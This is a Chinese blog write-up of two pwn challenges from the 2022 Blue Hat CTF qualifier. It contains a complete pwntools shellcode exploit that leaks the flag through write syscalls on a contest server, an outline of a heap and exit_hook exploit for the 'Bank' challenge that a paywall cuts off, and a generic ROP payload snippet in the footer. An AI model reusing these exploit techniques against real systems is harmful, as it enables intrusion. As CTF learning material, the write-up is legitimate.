2022蓝帽pwn初赛wp

原创 已于 2022-07-10 00:15:13 修改 · 621 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#pwn

于 2022-07-10 00:14:22 首次发布
本文介绍了两个挑战:EscapeShellcode中的内存覆盖技巧和银行应用的内存安全漏洞利用。第一部分涉及利用write函数进行代码执行,第二部分展示了如何通过内存操作和功能滥用(如realloc、memcpy)来获取 libc 基址并触发退出。

第一题的第五个解出:

8RXOF$HL_Y3FZ%XNJ3DO%G6

第二题的三血

4O`7~$5(1E(BX]~7UIT4DF1

总体难度偏简单。

EscapeShellcode

清空了所有寄存器(设置为0xdeadbeefdeadbeef),包括rsp。

flag读到了bss段上。

seccomp只允许调用read和write。这里我只用到了write。

利用的主要是:

write,read函数遇到不可读写的区域,会返回<0的值,且不会令程序崩溃。

  • 首先利用syscall会给rcx赋值的特性,将rip的值赋给rcx。
  • 将rcx赋给r8
  • r8减去一个很大的偏移,令他小于codebase,将r8赋给rsi
  • cmp rax,0,不断调用write。
  • r8+=0x200
  • 那么最终r8一定会落在codebase ±0x200范围内,这时候加上偏移0x3f00,加上write函数写的0x200字节,便一定能覆盖到flag。
from pwn import *
context.terminal = ['gnome-terminal', '-x', 'sh', '-c']
context.log_level = 'debug'
context(arch='amd64')
# r = process('/mnt/hgfs/ubuntu/2022蓝帽/escape_shellcode/escape_shellcode')
r = remote('47.94.194.27',21957)

# gdb.attach(r)
shellcode='''
mov rax,0
syscall
sub rcx,0x3000000
mov r8,rcx
a:
  mov rax,1
  mov rsi,r8
  mov rdi,1
  mov rdx,0x200
  syscall
  add r8,0x200
cmp rax,0
jng a
add rsi,0x3f00
mov rax,1
syscall
'''

r.sendline(asm(shellcode))
r.interactive()

放一个打通的截图:

image-20220709093227650

Bank

最开始程序没提供libc,有点搞。

程序代码比较多,稍微理一下逻辑:

实现了一个类似于银行功能:登录存款取款转账等功能。

存款上限为0x190,全存进去。

代码审计后发现只有转账功能中可以利用。

转账功能中有以下功能:

image-20220709134303865

admin可以越界泄露,hacker可以任意地址free,guest稳定malloc(0x18)大小,ghost则是可以realloc,abyss则是任意地址写一次后调用exit()

思路:

  • 通过realloc先free掉一个堆块,用admin功能show出堆基址。
  • 伪造一个unsortedbin堆块,free掉他,同时用guest功能切割后show泄露libc基址。
  • 然后用abyss功能打exit_hook覆盖为ogg即可

难度应该主要在逆向了。

exp:

from pwn import *
context.terminal = ['gnome-terminal', '-x', 'sh', '-c']
context.log_level = 'debug'
# r = process('/mnt/hgfs/ubuntu/2022蓝帽/bank/Bank')</
最低0.47元/天 解锁文章
2022 初赛wp
weixin_46483787的博客
07-11 674
部分wp
pwn2022 极客大挑战
woodwhale的博客
11-22 1746
2022 极客大挑战 pwn题解
2022初赛电子取证
wuwuliuliu0524的博客
09-02 1563
加密的文档中还有我天.docx和新建文本文档.txt,新建文本文档.txt20MB大的很奇怪,猜测是被truecrypt加密的对象,改后缀为.hc,用取证大师加载后解密,密钥来自工具集-内存镜像取证工具,在1.dmp中能搜到truecrypt密钥。据了解,某网上商城系一团伙日常资金往来用,从2022年4月1日起使用虚拟币GG币进行交易,现已获得该网站的源代码以及部分数据库备份文件,请您对以下问题进行分析解答。[答案格式:flag{abCd1234}][答案格式:asd.xda.asd.ca]
2022 第六届初赛 WP By 知行网安
xczzhf的博客
07-11 1618
第六届wp
2022初赛wp
mumuzi的博客
07-10 6423
2022初赛
2022初赛 部分wp
akxnxbshai的博客
07-10 1140
2022初赛部分wp
2022 CISCN 初赛pwn完整wp
weixin_46483787的博客
06-09 2538
2022 CISCN 初赛pwn的完整wp
2022第六届初赛writeup
qq_49422880的博客
07-10 2427
Writeup
2021 pwn slient
weixin_51298357的博客
04-29 1140
2021 pwn slient 这道题不是第一个上的pwn题,第一道太难了,第二个一出来就去看第二个题了= = 一个沙箱绕过的题,以前没写过类似的,当场也没有写出来,于是复现一下。 前置知识 seccomp概述 restrict模式:SECCOMP_SET_MODE_STRICT 白名单:read,write,_exit,sigreturn 除了已经打开的文件描述符和允许的系统调用,如果发起其他系统调用,内核会使用SIGKILL或SIGSYS终止进程 filter模式:SECCOMP
2022初赛部分wp
qq_55882340的博客
07-11 1560
2022初赛部分wp
2022初赛取证部分wp(详细)
qq_63522833的博客
07-10 3382
目录前言手机取证_1&2程序分析_1&2&3计算机取证_2&3&4 前言 本文是2022初赛取证部分复盘,感觉题目难度适中,因此选择性的记录了做出来的部分。这不是本次比完整的WP,如果有需要可以翻一翻其他大师傅的文章 手机取证_1&2 题目描述: 现对一个苹果手机进行取证,请您对以下问题进行分析解答。 1.627604C2-C586-48C1-AA16-FF33C3022159.PNG图片的分辨率是?(答案参考格式:1920x1080) 2.姜总的
2022初赛部分WP 复现
xxfsa的博客
03-12 536
(答案参考格式:flag{abcABC123})TrueCrypt加密中存在的flag值为?(答案参考格式:flag{abcABC123})把文件导出之后,连个office文件都经过加密,猜测pass.txt为字典,字典爆破。如果用取证大师可以直接看到 新建文本文档.txt是TrueCrypt加密。如果没有取证大师,把文件提出来之后打开也能发现不对劲,文件体积太大了。取证大师分析.dd文件,可以看到几个被加密文件以及pass.txt。还可以用取证大师的内存分析工具直接获取TrueCrypt的密钥文件。
2022 pwn Bank
z1r0的博客
07-12 633
保护全开 这道题其实逆清楚了基本就可以解出来了 这里是输入对应的单词就可以进入对应的功能 先看一下Deposit功能 先判断是否login,接着输入多少钱,然后判断一下card_money钱是否足够,如何足够则总钱+输入的,这个函数没什么用。 看一下put函数 这里就是需要存放的钱,判断是否小于总钱。并将需要存放的钱放入card_money中 接下来再看login函数 输入card_numbers,需要过检测 长度大于0,并在0-9之间,接下来输入密码的时候长度需要大于5,也是0-9 满足上面
2022 pwn escape_shellcode
z1r0的博客
07-11 492
写shellcode题 只允许使用read和write,但是程序在开始的时候将flag读取到了bss段上 并且在调用shellcode之前还将寄存器的值都给清理掉了。 因为程序开了pie所以直接使用flag地址行不通。那就需要思考一下如何泄露出flag地址。 这里可以借助fs寄存器来得到有关text段的地址,再算出flag地址即可。 fs寄存器用于保存线程局部存储TLS,TLS主要是为了避免多个线程访问同一全局变量或静态变量所导致的冲突。所以fs寄存器周围会有线程地址。在笔者调试的时候发现在0x300
2022初赛密码wp(复现)
mxx307的博客
07-11 1021
2022密码题wp(复现)
强网2022 pwn 题解析——yakacmp
CoLin的pwn小屋
08-07 1227
强网2022 pwn 题解析——yakacmp
[*CTF 2022 pwn] examination
weixin_52640415的博客
04-17 685
抽空参加个比,水平有限只作了一道题,但还是要记录一下,毕竟好多人还0解呢。学渣的逆袭。 英文写的是ret2shool 这个跟ret2XXX的没关系。 代码长了读程序就麻烦,慢慢读把函数功能整理如下(叫法随个人理解,英文看单词不认识): 教师菜单 增加学生:增加一个学生结构,管理块chunk :0x28含指向成绩单:stud{ptr_s,0,0,0,0} 成绩单chunk:0x18含学生评级,成绩,评价指针,评价长度 s{int idx,int score, ptr_prv,int x,int pr
SCTF2021 pwn gadget 出题思路+预期非预期解
令则
01-19 1400
SCTF2021 pwn gadget 出题思路+预期非预期解
2022柏鹭pwn复现
m0_63437215的博客
11-19 1491
2022柏鹭pwn
2022_CTFpwn
最新发布
02-18
### 2022 CTF Pwn 网络安全竞信息与资源 #### 关于CTF Pwn类目概述 CTF中的Pwn挑战主要涉及逆向工程、漏洞挖掘和利用等方面的知识和技术。这类比旨在测试参者的二进制漏洞发现能力和编写exploit的能力,对于提高实际攻防能力具有重要意义[^4]。 #### 2022年度具体活动详情 虽然未找到专门针对2022年的CTF Pwn专项事记录,但是可以推测该年份内许多大型综合性CTF活动中均设有Pwn环节。例如DEF CON CTF等知名国际事会定期举办并包含此类项目。此外,BugKu平台作为一个活跃的在线练习场地,也可能组织过相关主题的比或训练营[^3]。 #### 学习资料推荐 为了更好地准备参加类似的竞,《CTF竞权威指南(Pwn篇)》提供了详尽的学习路径和技术指导,适合希望深入理解Pwn技巧的人士阅读学习。这本书籍不仅涵盖了基础概念讲解,还包含了大量实战案例分析,有助于读者快速上手实践操作[^2]。 ```python # Python代码示例:简单的ROP链构建(仅用于教育目的) from pwn import * elf = ELF('./vuln_binary') rop = ROP(elf) # 假设存在一个溢出点offset=16字节 payload = b'A' * 16 + rop.chain() io = process(['./vuln_binary']) io.sendline(payload) io.interactive() ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值